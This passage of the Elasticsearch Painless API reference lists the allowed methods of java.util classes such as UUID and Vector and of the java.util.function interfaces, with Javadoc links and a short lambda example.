{java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* SortedSet 
{java11-javadoc}/java.base/java/util/SortedSet.html#subSet(java.lang.Object,java.lang.Object)[subSet](def, def) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableSet.html#subSet(java.lang.Object,boolean,java.lang.Object,boolean)[subSet](def, boolean, def, boolean) -* double sum() -* double sum(ToDoubleFunction) -* SortedSet {java11-javadoc}/java.base/java/util/SortedSet.html#tailSet(java.lang.Object)[tailSet](def) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableSet.html#tailSet(java.lang.Object,boolean)[tailSet](def, boolean) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-UUID]] -==== UUID -* static UUID {java11-javadoc}/java.base/java/util/UUID.html#fromString(java.lang.String)[fromString](null) -* static UUID {java11-javadoc}/java.base/java/util/UUID.html#nameUUIDFromBytes(byte%5B%5D)[nameUUIDFromBytes](byte[]) -* static UUID {java11-javadoc}/java.base/java/util/UUID.html#randomUUID()[randomUUID]() -* {java11-javadoc}/java.base/java/util/UUID.html#(long,long)[UUID](long, long) -* int {java11-javadoc}/java.base/java/util/UUID.html#clockSequence()[clockSequence]() -* int {java11-javadoc}/java.base/java/util/UUID.html#compareTo(java.util.UUID)[compareTo](UUID) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/util/UUID.html#getLeastSignificantBits()[getLeastSignificantBits]() -* long {java11-javadoc}/java.base/java/util/UUID.html#getMostSignificantBits()[getMostSignificantBits]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* long {java11-javadoc}/java.base/java/util/UUID.html#node()[node]() -* long {java11-javadoc}/java.base/java/util/UUID.html#timestamp()[timestamp]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* int {java11-javadoc}/java.base/java/util/UUID.html#variant()[variant]() -* int {java11-javadoc}/java.base/java/util/UUID.html#version()[version]() - - -[[painless-api-reference-shared-UnknownFormatConversionException]] -==== UnknownFormatConversionException -* {java11-javadoc}/java.base/java/util/UnknownFormatConversionException.html#(java.lang.String)[UnknownFormatConversionException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/UnknownFormatConversionException.html#getConversion()[getConversion]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-UnknownFormatFlagsException]] -==== UnknownFormatFlagsException -* {java11-javadoc}/java.base/java/util/UnknownFormatFlagsException.html#(java.lang.String)[UnknownFormatFlagsException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null 
{java11-javadoc}/java.base/java/util/UnknownFormatFlagsException.html#getFlags()[getFlags]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Vector]] -==== Vector -* {java11-javadoc}/java.base/java/util/Vector.html#()[Vector]() -* {java11-javadoc}/java.base/java/util/Vector.html#(java.util.Collection)[Vector](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* void {java11-javadoc}/java.base/java/util/Vector.html#addElement(java.lang.Object)[addElement](def) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/Vector.html#clone()[clone]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* void {java11-javadoc}/java.base/java/util/Vector.html#copyInto(java.lang.Object%5B%5D)[copyInto](Object[]) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* def {java11-javadoc}/java.base/java/util/Vector.html#elementAt(int)[elementAt](int) -* Enumeration {java11-javadoc}/java.base/java/util/Vector.html#elements()[elements]() -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* def {java11-javadoc}/java.base/java/util/Vector.html#firstElement()[firstElement]() -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* void {java11-javadoc}/java.base/java/util/Vector.html#insertElementAt(java.lang.Object,int)[insertElementAt](def, int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* def {java11-javadoc}/java.base/java/util/Vector.html#lastElement()[lastElement]() -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* int 
{java11-javadoc}/java.base/java/util/Vector.html#lastIndexOf(java.lang.Object,int)[lastIndexOf](def, int) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* void {java11-javadoc}/java.base/java/util/Vector.html#removeAllElements()[removeAllElements]() -* boolean {java11-javadoc}/java.base/java/util/Vector.html#removeElement(java.lang.Object)[removeElement](def) -* void {java11-javadoc}/java.base/java/util/Vector.html#removeElementAt(int)[removeElementAt](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* void {java11-javadoc}/java.base/java/util/Vector.html#setElementAt(java.lang.Object,int)[setElementAt](def, int) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-java-util-function"] -=== Shared API for package java.util.function -See the <> for a high-level overview of all packages and classes. 
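In Painless these functional interfaces are normally satisfied with lambdas or method references rather than implemented explicitly. A minimal sketch, using the `TreeSet` augmentations listed earlier (`findAll` takes a `Predicate`, `sum` takes a `ToDoubleFunction`):

[source,painless]
----
TreeSet values = new TreeSet();
values.addAll([4, 1, 3, 2]);
// Predicate supplied as a lambda: keep only the even elements
List evens = values.findAll(x -> x % 2 == 0);
// ToDoubleFunction supplied as a lambda: sum of squares
double total = values.sum(x -> x * x);
----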
- -[[painless-api-reference-shared-BiConsumer]] -==== BiConsumer -* void {java11-javadoc}/java.base/java/util/function/BiConsumer.html#accept(java.lang.Object,java.lang.Object)[accept](def, def) -* BiConsumer {java11-javadoc}/java.base/java/util/function/BiConsumer.html#andThen(java.util.function.BiConsumer)[andThen](BiConsumer) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-BiFunction]] -==== BiFunction -* BiFunction {java11-javadoc}/java.base/java/util/function/BiFunction.html#andThen(java.util.function.Function)[andThen](Function) -* def {java11-javadoc}/java.base/java/util/function/BiFunction.html#apply(java.lang.Object,java.lang.Object)[apply](def, def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-BiPredicate]] -==== BiPredicate -* BiPredicate {java11-javadoc}/java.base/java/util/function/BiPredicate.html#and(java.util.function.BiPredicate)[and](BiPredicate) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* BiPredicate {java11-javadoc}/java.base/java/util/function/BiPredicate.html#negate()[negate]() -* BiPredicate {java11-javadoc}/java.base/java/util/function/BiPredicate.html#or(java.util.function.BiPredicate)[or](BiPredicate) -* boolean {java11-javadoc}/java.base/java/util/function/BiPredicate.html#test(java.lang.Object,java.lang.Object)[test](def, def) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-BinaryOperator]] -==== BinaryOperator -* static BinaryOperator {java11-javadoc}/java.base/java/util/function/BinaryOperator.html#maxBy(java.util.Comparator)[maxBy](Comparator) -* static BinaryOperator {java11-javadoc}/java.base/java/util/function/BinaryOperator.html#minBy(java.util.Comparator)[minBy](Comparator) -* BiFunction {java11-javadoc}/java.base/java/util/function/BiFunction.html#andThen(java.util.function.Function)[andThen](Function) -* def {java11-javadoc}/java.base/java/util/function/BiFunction.html#apply(java.lang.Object,java.lang.Object)[apply](def, def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-BooleanSupplier]] -==== BooleanSupplier -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/util/function/BooleanSupplier.html#getAsBoolean()[getAsBoolean]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Consumer]] -==== Consumer -* void {java11-javadoc}/java.base/java/util/function/Consumer.html#accept(java.lang.Object)[accept](def) -* Consumer 
{java11-javadoc}/java.base/java/util/function/Consumer.html#andThen(java.util.function.Consumer)[andThen](Consumer) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoubleBinaryOperator]] -==== DoubleBinaryOperator -* double {java11-javadoc}/java.base/java/util/function/DoubleBinaryOperator.html#applyAsDouble(double,double)[applyAsDouble](double, double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoubleConsumer]] -==== DoubleConsumer -* void {java11-javadoc}/java.base/java/util/function/DoubleConsumer.html#accept(double)[accept](double) -* DoubleConsumer {java11-javadoc}/java.base/java/util/function/DoubleConsumer.html#andThen(java.util.function.DoubleConsumer)[andThen](DoubleConsumer) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoubleFunction]] -==== DoubleFunction -* def {java11-javadoc}/java.base/java/util/function/DoubleFunction.html#apply(double)[apply](double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoublePredicate]] -==== DoublePredicate -* DoublePredicate {java11-javadoc}/java.base/java/util/function/DoublePredicate.html#and(java.util.function.DoublePredicate)[and](DoublePredicate) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* DoublePredicate {java11-javadoc}/java.base/java/util/function/DoublePredicate.html#negate()[negate]() -* DoublePredicate {java11-javadoc}/java.base/java/util/function/DoublePredicate.html#or(java.util.function.DoublePredicate)[or](DoublePredicate) -* boolean {java11-javadoc}/java.base/java/util/function/DoublePredicate.html#test(double)[test](double) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoubleSupplier]] -==== DoubleSupplier -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* double {java11-javadoc}/java.base/java/util/function/DoubleSupplier.html#getAsDouble()[getAsDouble]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoubleToIntFunction]] -==== DoubleToIntFunction -* int {java11-javadoc}/java.base/java/util/function/DoubleToIntFunction.html#applyAsInt(double)[applyAsInt](double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int 
{java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoubleToLongFunction]] -==== DoubleToLongFunction -* long {java11-javadoc}/java.base/java/util/function/DoubleToLongFunction.html#applyAsLong(double)[applyAsLong](double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoubleUnaryOperator]] -==== DoubleUnaryOperator -* static DoubleUnaryOperator {java11-javadoc}/java.base/java/util/function/DoubleUnaryOperator.html#identity()[identity]() -* DoubleUnaryOperator {java11-javadoc}/java.base/java/util/function/DoubleUnaryOperator.html#andThen(java.util.function.DoubleUnaryOperator)[andThen](DoubleUnaryOperator) -* double {java11-javadoc}/java.base/java/util/function/DoubleUnaryOperator.html#applyAsDouble(double)[applyAsDouble](double) -* DoubleUnaryOperator {java11-javadoc}/java.base/java/util/function/DoubleUnaryOperator.html#compose(java.util.function.DoubleUnaryOperator)[compose](DoubleUnaryOperator) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Function]] -==== Function -* static Function {java11-javadoc}/java.base/java/util/function/Function.html#identity()[identity]() -* Function {java11-javadoc}/java.base/java/util/function/Function.html#andThen(java.util.function.Function)[andThen](Function) -* def {java11-javadoc}/java.base/java/util/function/Function.html#apply(java.lang.Object)[apply](def) -* Function {java11-javadoc}/java.base/java/util/function/Function.html#compose(java.util.function.Function)[compose](Function) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntBinaryOperator]] -==== IntBinaryOperator -* int {java11-javadoc}/java.base/java/util/function/IntBinaryOperator.html#applyAsInt(int,int)[applyAsInt](int, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntConsumer]] -==== IntConsumer -* void {java11-javadoc}/java.base/java/util/function/IntConsumer.html#accept(int)[accept](int) -* IntConsumer {java11-javadoc}/java.base/java/util/function/IntConsumer.html#andThen(java.util.function.IntConsumer)[andThen](IntConsumer) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntFunction]] -==== IntFunction -* def {java11-javadoc}/java.base/java/util/function/IntFunction.html#apply(int)[apply](int) -* boolean 
{java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntPredicate]] -==== IntPredicate -* IntPredicate {java11-javadoc}/java.base/java/util/function/IntPredicate.html#and(java.util.function.IntPredicate)[and](IntPredicate) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* IntPredicate {java11-javadoc}/java.base/java/util/function/IntPredicate.html#negate()[negate]() -* IntPredicate {java11-javadoc}/java.base/java/util/function/IntPredicate.html#or(java.util.function.IntPredicate)[or](IntPredicate) -* boolean {java11-javadoc}/java.base/java/util/function/IntPredicate.html#test(int)[test](int) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntSupplier]] -==== IntSupplier -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/util/function/IntSupplier.html#getAsInt()[getAsInt]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntToDoubleFunction]] -==== IntToDoubleFunction -* double {java11-javadoc}/java.base/java/util/function/IntToDoubleFunction.html#applyAsDouble(int)[applyAsDouble](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntToLongFunction]] -==== IntToLongFunction -* long {java11-javadoc}/java.base/java/util/function/IntToLongFunction.html#applyAsLong(int)[applyAsLong](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntUnaryOperator]] -==== IntUnaryOperator -* static IntUnaryOperator {java11-javadoc}/java.base/java/util/function/IntUnaryOperator.html#identity()[identity]() -* IntUnaryOperator {java11-javadoc}/java.base/java/util/function/IntUnaryOperator.html#andThen(java.util.function.IntUnaryOperator)[andThen](IntUnaryOperator) -* int {java11-javadoc}/java.base/java/util/function/IntUnaryOperator.html#applyAsInt(int)[applyAsInt](int) -* IntUnaryOperator {java11-javadoc}/java.base/java/util/function/IntUnaryOperator.html#compose(java.util.function.IntUnaryOperator)[compose](IntUnaryOperator) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongBinaryOperator]] -==== LongBinaryOperator -* long {java11-javadoc}/java.base/java/util/function/LongBinaryOperator.html#applyAsLong(long,long)[applyAsLong](long, long) -* boolean 
{java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongConsumer]] -==== LongConsumer -* void {java11-javadoc}/java.base/java/util/function/LongConsumer.html#accept(long)[accept](long) -* LongConsumer {java11-javadoc}/java.base/java/util/function/LongConsumer.html#andThen(java.util.function.LongConsumer)[andThen](LongConsumer) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongFunction]] -==== LongFunction -* def {java11-javadoc}/java.base/java/util/function/LongFunction.html#apply(long)[apply](long) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongPredicate]] -==== LongPredicate -* LongPredicate {java11-javadoc}/java.base/java/util/function/LongPredicate.html#and(java.util.function.LongPredicate)[and](LongPredicate) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* LongPredicate {java11-javadoc}/java.base/java/util/function/LongPredicate.html#negate()[negate]() -* LongPredicate {java11-javadoc}/java.base/java/util/function/LongPredicate.html#or(java.util.function.LongPredicate)[or](LongPredicate) -* boolean {java11-javadoc}/java.base/java/util/function/LongPredicate.html#test(long)[test](long) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongSupplier]] -==== LongSupplier -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/util/function/LongSupplier.html#getAsLong()[getAsLong]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongToDoubleFunction]] -==== LongToDoubleFunction -* double {java11-javadoc}/java.base/java/util/function/LongToDoubleFunction.html#applyAsDouble(long)[applyAsDouble](long) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongToIntFunction]] -==== LongToIntFunction -* int {java11-javadoc}/java.base/java/util/function/LongToIntFunction.html#applyAsInt(long)[applyAsInt](long) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongUnaryOperator]] -==== LongUnaryOperator -* static LongUnaryOperator 
{java11-javadoc}/java.base/java/util/function/LongUnaryOperator.html#identity()[identity]() -* LongUnaryOperator {java11-javadoc}/java.base/java/util/function/LongUnaryOperator.html#andThen(java.util.function.LongUnaryOperator)[andThen](LongUnaryOperator) -* long {java11-javadoc}/java.base/java/util/function/LongUnaryOperator.html#applyAsLong(long)[applyAsLong](long) -* LongUnaryOperator {java11-javadoc}/java.base/java/util/function/LongUnaryOperator.html#compose(java.util.function.LongUnaryOperator)[compose](LongUnaryOperator) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ObjDoubleConsumer]] -==== ObjDoubleConsumer -* void {java11-javadoc}/java.base/java/util/function/ObjDoubleConsumer.html#accept(java.lang.Object,double)[accept](def, double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ObjIntConsumer]] -==== ObjIntConsumer -* void {java11-javadoc}/java.base/java/util/function/ObjIntConsumer.html#accept(java.lang.Object,int)[accept](def, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ObjLongConsumer]] -==== ObjLongConsumer -* void {java11-javadoc}/java.base/java/util/function/ObjLongConsumer.html#accept(java.lang.Object,long)[accept](def, long) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Predicate]] -==== Predicate -* static Predicate {java11-javadoc}/java.base/java/util/function/Predicate.html#isEqual(java.lang.Object)[isEqual](def) -* Predicate {java11-javadoc}/java.base/java/util/function/Predicate.html#and(java.util.function.Predicate)[and](Predicate) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Predicate {java11-javadoc}/java.base/java/util/function/Predicate.html#negate()[negate]() -* Predicate {java11-javadoc}/java.base/java/util/function/Predicate.html#or(java.util.function.Predicate)[or](Predicate) -* boolean {java11-javadoc}/java.base/java/util/function/Predicate.html#test(java.lang.Object)[test](def) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Supplier]] -==== Supplier -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* def {java11-javadoc}/java.base/java/util/function/Supplier.html#get()[get]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ToDoubleBiFunction]] -==== 
